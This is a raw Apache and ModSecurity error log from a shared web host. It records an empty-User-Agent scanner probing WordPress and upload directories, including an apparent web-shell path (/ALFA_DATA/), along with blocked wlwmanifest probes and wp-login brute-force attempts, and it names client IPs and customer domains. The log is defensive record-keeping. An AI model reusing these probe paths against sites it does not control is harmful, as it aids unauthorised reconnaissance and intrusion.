[Tue May 26 17:03:20.570110 2026] [autoindex:error] [pid 851641:tid 851782] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:20.570729 2026] [security2:error] [pid 851641:tid 851782] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFABp8QSN2510avp4iYAAAAAs"]
[Tue May 26 17:03:20.587610 2026] [security2:error] [pid 851641:tid 851851] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/certificates/"] [unique_id "ahWFABp8QSN2510avp4iXgAAAFA"]
[Tue May 26 17:03:20.971125 2026] [autoindex:error] [pid 851641:tid 851860] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/customize/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:20.971782 2026] [security2:error] [pid 851641:tid 851860] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFABp8QSN2510avp4ifAAAAFk"]
[Tue May 26 17:03:20.972279 2026] [security2:error] [pid 851641:tid 851822] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/customize/"] [unique_id "ahWFABp8QSN2510avp4iegAAADM"]
[Tue May 26 17:03:21.200345 2026] [autoindex:error] [pid 851641:tid 851835] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:21.201089 2026] [security2:error] [pid 851641:tid 851835] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFARp8QSN2510avp4igwAAAEA"]
[Tue May 26 17:03:21.201542 2026] [security2:error] [pid 851641:tid 851892] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/fonts/"] [unique_id "ahWFARp8QSN2510avp4igQAAAHk"]
[Tue May 26 17:03:21.308433 2026] [security2:error] [pid 851641:tid 851778] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFABp8QSN2510avp4idwAAAAc"]
[Tue May 26 17:03:21.423874 2026] [autoindex:error] [pid 851641:tid 851856] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:21.424942 2026] [security2:error] [pid 851641:tid 851856] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFARp8QSN2510avp4iiwAAAFU"]
[Tue May 26 17:03:21.425423 2026] [security2:error] [pid 851641:tid 851858] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/images/"] [unique_id "ahWFARp8QSN2510avp4iiQAAAFc"]
[Tue May 26 17:03:21.524382 2026] [security2:error] [pid 851641:tid 851783] [client 5.255.99.53:46476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFARp8QSN2510avp4igAAAAAw"], referer: http://preetishah.com/manifest.json
[Tue May 26 17:03:21.786853 2026] [autoindex:error] [pid 851641:tid 851877] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:21.787495 2026] [security2:error] [pid 851641:tid 851877] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFARp8QSN2510avp4ilgAAAGo"]
[Tue May 26 17:03:21.787876 2026] [security2:error] [pid 851641:tid 851798] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/.well-known/"] [unique_id "ahWFARp8QSN2510avp4ilAAAABs"]
[Tue May 26 17:03:22.124530 2026] [security2:error] [pid 851641:tid 851878] [client 157.245.139.219:62338] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWFAhp8QSN2510avp4ixAAAAGs"]
[Tue May 26 17:03:22.146347 2026] [security2:error] [pid 851641:tid 851779] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFARp8QSN2510avp4inwAAAAg"]
[Tue May 26 17:03:22.160863 2026] [security2:error] [pid 851641:tid 851888] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/ALFA_DATA/"] [unique_id "ahWFARp8QSN2510avp4inQAAAHU"]
[Tue May 26 17:03:22.202316 2026] [security2:error] [pid 851641:tid 851710] [remote 168.63.79.147:55914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWFAhp8QSN2510avp4ioQAAPEQ"]
[Tue May 26 17:03:22.403172 2026] [security2:error] [pid 851641:tid 851805] [client 5.255.99.53:57282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFAhp8QSN2510avp4ixQAAACI"]
[Tue May 26 17:03:22.942351 2026] [security2:error] [pid 851641:tid 851859] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFAhp8QSN2510avp4i2AAAAFg"]
[Tue May 26 17:03:22.943825 2026] [security2:error] [pid 851641:tid 851785] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/.well-knownold/"] [unique_id "ahWFAhp8QSN2510avp4i1gAAAA4"]
[Tue May 26 17:03:23.183985 2026] [autoindex:error] [pid 851641:tid 851856] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:23.184675 2026] [security2:error] [pid 851641:tid 851856] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFAxp8QSN2510avp4i6gAAAFU"]
[Tue May 26 17:03:23.185056 2026] [security2:error] [pid 851641:tid 851847] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/.well-known/acme-challenge/"] [unique_id "ahWFAxp8QSN2510avp4i6AAAAEw"]
[Tue May 26 17:03:23.284753 2026] [security2:error] [pid 851641:tid 851835] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFAhp8QSN2510avp4i2wAAAEA"]
[Tue May 26 17:03:23.485987 2026] [cgid:error] [pid 851641:tid 851839] [client 138.199.19.160:0] AH01265: stderr from /home2/chrisdjb/public_html/cgi-bin/: attempt to invoke directory as script
[Tue May 26 17:03:23.486677 2026] [security2:error] [pid 851641:tid 851839] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFAxp8QSN2510avp4i8AAAAEQ"]
[Tue May 26 17:03:23.487115 2026] [security2:error] [pid 851641:tid 851874] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-bin/"] [unique_id "ahWFAxp8QSN2510avp4i7QAAAGc"]
[Tue May 26 17:03:23.791153 2026] [security2:error] [pid 851641:tid 851773] [client 5.255.99.53:46476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFAxp8QSN2510avp4i6wAAAAI"], referer: http://preetishah.com/build-manifest.json
[Tue May 26 17:03:23.934561 2026] [security2:error] [pid 851641:tid 851879] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFAxp8QSN2510avp4jAgAAAGw"]
[Tue May 26 17:03:23.934916 2026] [security2:error] [pid 851641:tid 851829] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index/"] [unique_id "ahWFAxp8QSN2510avp4jAAAAADo"]
[Tue May 26 17:03:24.191655 2026] [security2:error] [pid 851641:tid 851817] [client 14.236.229.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFAxp8QSN2510avp4i_wAAAC4"]
[Tue May 26 17:03:24.510794 2026] [security2:error] [pid 851641:tid 851859] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFBBp8QSN2510avp4jHQAAAFg"]
[Tue May 26 17:03:24.511072 2026] [security2:error] [pid 851641:tid 851887] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/id/"] [unique_id "ahWFBBp8QSN2510avp4jGwAAAHQ"]
[Tue May 26 17:03:24.938756 2026] [security2:error] [pid 851641:tid 851865] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFBBp8QSN2510avp4jTwAAAF4"]
[Tue May 26 17:03:24.939001 2026] [security2:error] [pid 851641:tid 851872] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/www/"] [unique_id "ahWFBBp8QSN2510avp4jTQAAAGU"]
[Tue May 26 17:03:25.016713 2026] [security2:error] [pid 851641:tid 851898] [client 5.255.99.53:57282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFBBp8QSN2510avp4jUAAAAH8"]
[Tue May 26 17:03:25.305418 2026] [security2:error] [pid 851641:tid 851806] [client 157.245.139.219:65010] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWFBRp8QSN2510avp4jZgAAACM"]
[Tue May 26 17:03:25.328717 2026] [security2:error] [pid 851641:tid 851862] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFBRp8QSN2510avp4jZQAAAFs"]
[Tue May 26 17:03:25.329199 2026] [security2:error] [pid 851641:tid 851878] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/web/"] [unique_id "ahWFBRp8QSN2510avp4jYwAAAGs"]
[Tue May 26 17:03:25.474864 2026] [security2:error] [pid 851641:tid 851837] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFBRp8QSN2510avp4jXwAAAEI"]
[Tue May 26 17:03:25.541941 2026] [log_config:warn] [pid 839808:tid 839979] (32)Broken pipe: [client 152.58.169.255:41990] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://samayikprasanga.in/epaper.php?pn=11
[Tue May 26 17:03:25.541962 2026] [log_config:warn] [pid 839808:tid 839979] (32)Broken pipe: [client 152.58.169.255:41990] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://samayikprasanga.in/epaper.php?pn=11
[Tue May 26 17:03:25.698382 2026] [security2:error] [pid 851641:tid 851831] [client 5.255.99.53:46476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFBRp8QSN2510avp4jaAAAADw"], referer: http://preetishah.com/_next/static/buildManifest.js
[Tue May 26 17:03:25.743066 2026] [security2:error] [pid 851641:tid 851893] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFBRp8QSN2510avp4jcgAAAHo"]
[Tue May 26 17:03:25.743231 2026] [security2:error] [pid 851641:tid 851788] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/uploads/"] [unique_id "ahWFBRp8QSN2510avp4jcAAAABE"]
[Tue May 26 17:03:26.220449 2026] [security2:error] [pid 851641:tid 851785] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFBhp8QSN2510avp4jgQAAAA4"]
[Tue May 26 17:03:26.221014 2026] [security2:error] [pid 851641:tid 851804] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/upload/"] [unique_id "ahWFBhp8QSN2510avp4jfwAAACE"]
[Tue May 26 17:03:26.804210 2026] [security2:error] [pid 851641:tid 851810] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFBhp8QSN2510avp4jlgAAACc"]
[Tue May 26 17:03:26.804236 2026] [security2:error] [pid 851641:tid 851810] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFBhp8QSN2510avp4jlgAAACc"]
[Tue May 26 17:03:26.804532 2026] [security2:error] [pid 851641:tid 851857] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/admin/uploads/"] [unique_id "ahWFBhp8QSN2510avp4jlAAAAFY"]
[Tue May 26 17:03:27.329226 2026] [security2:error] [pid 851641:tid 851898] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFBxp8QSN2510avp4jowAAAH8"]
[Tue May 26 17:03:27.329271 2026] [security2:error] [pid 851641:tid 851898] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFBxp8QSN2510avp4jowAAAH8"]
[Tue May 26 17:03:27.329867 2026] [security2:error] [pid 851641:tid 851824] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/Admin/uploads/"] [unique_id "ahWFBxp8QSN2510avp4joQAAADU"]
[Tue May 26 17:03:27.672651 2026] [security2:error] [pid 851641:tid 851781] [client 5.255.99.53:57282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFBxp8QSN2510avp4jrQAAAAo"]
[Tue May 26 17:03:27.733136 2026] [security2:error] [pid 851641:tid 851877] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFBxp8QSN2510avp4juAAAAGo"]
[Tue May 26 17:03:27.733543 2026] [security2:error] [pid 851641:tid 851837] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/admin/"] [unique_id "ahWFBxp8QSN2510avp4jsQAAAEI"]
[Tue May 26 17:03:28.134337 2026] [security2:error] [pid 851641:tid 851771] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFBxp8QSN2510avp4juwAAAAA"]
[Tue May 26 17:03:28.159128 2026] [security2:error] [pid 851641:tid 851838] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFCBp8QSN2510avp4jxAAAAEM"]
[Tue May 26 17:03:28.159475 2026] [security2:error] [pid 851641:tid 851774] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/images/"] [unique_id "ahWFCBp8QSN2510avp4jwgAAAAM"]
[Tue May 26 17:03:28.484388 2026] [security2:error] [pid 851641:tid 851805] [client 157.245.139.219:49480] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWFCBp8QSN2510avp4j2AAAACI"]
[Tue May 26 17:03:28.633956 2026] [security2:error] [pid 851641:tid 851812] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFCBp8QSN2510avp4j1wAAACk"]
[Tue May 26 17:03:28.634641 2026] [security2:error] [pid 851641:tid 851775] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/assets/"] [unique_id "ahWFCBp8QSN2510avp4j1QAAAAQ"]
[Tue May 26 17:03:28.653667 2026] [security2:error] [pid 851641:tid 851813] [client 5.255.99.53:46476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFCBp8QSN2510avp4j0AAAACo"], referer: http://preetishah.com/_next/build-manifest.json
[Tue May 26 17:03:28.670035 2026] [security2:error] [pid 851641:tid 851854] [client 157.245.139.219:50397] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWFCBp8QSN2510avp4j3AAAAFM"]
[Tue May 26 17:03:28.852821 2026] [security2:error] [pid 851641:tid 851853] [client 157.245.139.219:50449] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWFCBp8QSN2510avp4j6wAAAFI"]
[Tue May 26 17:03:29.010721 2026] [security2:error] [pid 851641:tid 851794] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFCBp8QSN2510avp4j7gAAABc"]
